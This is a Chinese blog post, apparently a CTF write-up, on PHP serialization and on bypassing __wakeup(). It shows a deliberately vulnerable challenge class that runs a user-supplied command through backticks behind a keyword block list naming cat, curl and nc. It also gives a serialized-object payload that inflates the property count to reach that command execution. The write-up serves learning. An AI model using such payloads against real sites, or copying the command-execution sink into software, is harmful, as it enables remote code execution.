PHP序列化及__wakeup()函数漏洞利用

最新推荐文章于 2024-03-18 19:51:41 发布
最新推荐文章于 2024-03-18 19:51:41 发布
阅读量1.2k 收藏 9
点赞数 3
分类专栏: CTF 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45615127/article/details/111401521
版权

前言

本篇文章讲述php序列化和反序列化的知识,写的内容也是参考了一些大佬的文章再加上自己的理解,同时结合我在做题中遇到的题目来叙述,如有错误的地方欢迎大佬们指正。

正文

序列化:将对象转换成字符串。字符串包括 属性名 属性值 属性类型和该对象对应的类名。
反序列化:就是在适当的时候把这个字符串再转化成原来的对象。

序列化中常见的魔法函数:

__construct()创建对象时调用
__destruct()销毁对象时调用
__toString()把对象转换为字符串,打印一个对象时被调用
__sleep()在序列化前被调用,此功能可以用于清理对象,并返回一个包含对象中所有应被序列化的变量名称的数组
__wakeup()将在序列化之后立即被调用

先看一下序列化的例子:

class Test{
    public $data;
    private $any;

    public function __construct($data,$any){
        $this->data = $data;
        $this->any = $any;
    }
}

$nubmber = 123;
$str = 'test';
$bool = true;
$arr = array('a' => 1,'b' => 2);
$Object  = new Test("object",true);

var_dump(serialize($nubmber));
var_dump(serialize($str));
var_dump(serialize($bool));
var_dump(serialize($arr));
var_dump(serialize($Object));
================================================================================================
输出结果:
string(6) "i:123;"   i代表数字
string(11) "s:4:"test";"   s代表字符串
string(4) "b:1;"   b代表bool
string(30) "a:2:{s:1:"a";i:1;s:1:"b";i:2;}"   a代表数组
string(59) "O:4:"Test":2:{s:4:"data";s:6:"object";s:9:" Test any";b:1;}"
O代表对象;4代表类名Test占4个字符;Test:类名;2代表类中有两个属性;s代表字符串;4代表属性长度;data:属性名;
s:6:"object";:属性类型(字符串) 属性值长度 属性值
序列化后的对象的第二个属性跟第一个不一样是因为第二个属性是私有属性,下面会详细讲解

访问控制修饰符
如果访问控制修饰符不同,序列化后的属性长度和属性值也会有所不同

public(共有)
protect(受保护)
private(私有)
protected属性被序列化的时候属性值会变成:%00*%00属性名
private属性被序列化的时候属性值会变成:%00类名%00属性名(可是运行结果用空格代替了%00,这一点我也不清楚,因为%00是ASCII转url编码以后对应的空字符吧,还请大佬解答一下)

绕过 __wakeup() 函数

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

下面结合真题讲解一下,题目为BugKu的Web安慰奖,先看一下题目源码:

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

可以看出传入的username参数值必须为admin,但是它用wakeup函数重新给参数赋值了guest,这里我们直接跳过wakeup函数就行了。
原本对应的序列化后的对象为:

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}

绕过__wakeup()的payload:

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}
#这个题目里面的对象属性是受保护属性,根据对应的规则修改就可以了
因为对象里面只有两个属性,对应的属性个数为2,所以我们只需要需改属性个数值大于2就行了

结语

本人菜鸟一枚,文章中定会有不足之处,还请各位师傅指正,也希望师傅们能解答本文中的疑惑,感谢支持。

HackerTenG
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
c语言wakeup函数,Linux内核API __wake_up
weixin_34653651的博客
05-20 2123
__wake_up函数功能描述:此函数用于唤醒等待队列中处于特定状态的进程,此特定状态是此函数的第二个参数mode定义的。当进程的状态满足此特定状态时就有可能被唤醒,获得CPU资源,从而被调度执行。__wake_up文件包含__wake_up函数定义在内核源码中的位置:linux-3.19.3/kernel/sched/wait.c函数定义格式:__wake_up输入参数说明此函数的第一个输入参数...
PHP序列化/对象注入漏洞分析
10-22
为了测试和利用这个漏洞,我们可以使用像Burp Suite的SuperSerial插件这样的工具来探测目标应用程序是否容易受到PHP序列化攻击。一旦确定存在漏洞,攻击者可以创建一个PHP序列化payload,包含他们想要执行的命令。...
PHP序列化--_wakeup()绕过
最新发布
2302_79800344的博客
03-18 500
【代码】PHP序列化--_wakeup()绕过。
php序列化姿势学习
彼岸花苏陌的博客
01-16 2289
php序列化姿势学习1.__wakeup()函数绕过2./[oc]:\d+:/i研究欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1.__wakeup()函数绕过 wakeup函数作为ph
CTF必看~ PHP序列化漏洞6:绝妙_wakeup绕过技巧
Eason_LYC安全白帽子的成长博客
05-22 3619
_wakeup()是 PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用中,它通常不需要参数。
PHP序列化-__wakeup()方法漏洞(CVE-2016-7124)
bin789456的博客
08-13 3579
写在前面 wakeup()是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 漏洞影响的版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 漏洞出现情况 1.可以之间或简介控制序列化结果 2.__wakeup(
c语言wakeup函数,18.八大重量级函数闪亮登场(一)
weixin_36190812的博客
05-20 584
18.八大重量级函数闪亮登场(一)其实Hub在USB世界里扮演的又何尝不是这种角色呢?我们来看这个for循环,这是Hub驱动中最核心的代码,然而这段代码却自始至终是在为别的设备服务。在这个循环中,主要涉及8个重量级函数,先点明它们的角色分工。第一个函数,usb_alloc_dev(),一个struct usb_device结构体指针,申请内存,这个结构体指针可不是为Hub准备的,它正是为了Hub这...
PHP序列化漏洞.pdf
08-10
例如,攻击者可能利用`__wakeup`或`__destruct`这样的魔术方法来触发代码执行,或者通过操纵序列化数据中的类名和属性值来实现其他攻击目的。 ### 三、分析实践 在实际的安全分析中,我们需要关注以下几个方面: ...
PHP序列化操作方法分析
12-18
PHP序列化操作是将变量转换成可存储或传输的字符串形式的过程,这通常用于保存数据到文件、数据库或传输数据。反序列化则是将这个字符串还原为原始的变量结构。这两种操作是PHP中处理复杂数据结构的重要手段。 序列...
详解php序列化
12-17
这些魔术方法可以被利用来实现攻击,例如,通过精心构造的序列化字符串,攻击者可能在`__wakeup()`中执行任意代码,从而导致安全问题。因此,开发者应谨慎处理反序列化的数据,尤其是在从不可信来源接收时。可以...
wait_event()函数和wake_up()函数一些理解
oldfish的专栏
12-01 2369
1.wait_event()函数 wait_event()会调用__wait_event。 #define __wait_event(wq, condition) \ do { \ /*定义一个wait_queue_t类型的变量__wait并初始化,其中fun...
php单例模式 __wakeup,单例模式
weixin_39769767的博客
03-13 152
单例模式,正如其名,允许我们创建一个而且只能创建一个对象的类。这在整个系统的协同工作中非常有用,特别明确了只需一个类对象的时候。那么,为什么要实现这么奇怪的类,只实例化一次?在很多场景下会用到,如:配置类、Session类、Database类、Cache类、File类等等。这些只需要实例化一次,就可以在应用全局中使用。本文我们以数据库类为例。1 问题如果没有使用单例模式,会有什么样的问题?如下是一...
绕过__wakeup() 反序列化 合集
Jay17的博客
08-24 1335
绕过__wakeup() 反序列化 合集
序列化漏洞详解
热门推荐
LJH1999ZN的博客
03-07 3万+
目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用 八、反序列化漏洞的利用 1.__destruct()函数 2.__wakeup() 3.toString() ​九、反序列化漏洞的防御 一、什么是序列化和反序列化 序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串.
php up,PHP中 __wakeup()方法详解
weixin_36033929的博客
03-12 1039
__wakeup(),执行unserialize()时,先会调用这个函数如果说 __sleep() 是白的,那么 __wakeup() 就是黑的了。那么为什么呢?因为:与之相反,`unserialize()` 会检查是否存在一个 `__wakeup()` 方法。如果存在,则会先调用 `__wakeup` 方法,预先准备对象需要的资源。作用:__wakeup() 经常用在反序列化操作中,例如重新建立...
PHP __sleep和__wakeup
pythonluo的专栏
07-10 249
class B { public $c; public function __construct() { $this->c = 111; } public function __sleep() { return []; // return ['c']; } } cl...
PHP序列化用到的构造:__sleep() __wakeup()
每天记录点滴,日后总有收获。
11-27 5563
PHP进行序列化时,serialize() 检查类中是否有 __sleep() ,如果有,则该函数将在任何序列化之前运行。该函数必须返回一个需要进行序列化保存的成员属性数组,并且只序列化函数返回的这些成员属性. 该函数有两个作用: 第一. 在序列化之前,关闭对象可能具有的任何数据库连接等. 第二. 指定对象中需要被序列化的成员属性,如果某个属性比较大而不需要储存下来,可以不把它写进__slee
四个实例递进php序列化漏洞理解
大方子
09-14 7998
索引 最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行! D0g3 为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化和反序列化。顺便安利一下D0g3小组的平台...
PHP __sleep() 和 __wakeup() 魔术函数的使用方法
weixin_33716154的博客
03-03 346
2019独角兽企业重金招聘Python工程师标准>>> ...
input_wakeup_procfs_readers函数
05-18
`input_wakeup_procfs_readers` 函数是 Linux 内核中的一个函数,其定义在 `drivers/input/input.c` 文件中。 该函数的作用是唤醒等待在 `/proc/bus/input/devices` 文件上的读者。在 Linux 中,输入设备的信息可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HackerTenG

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值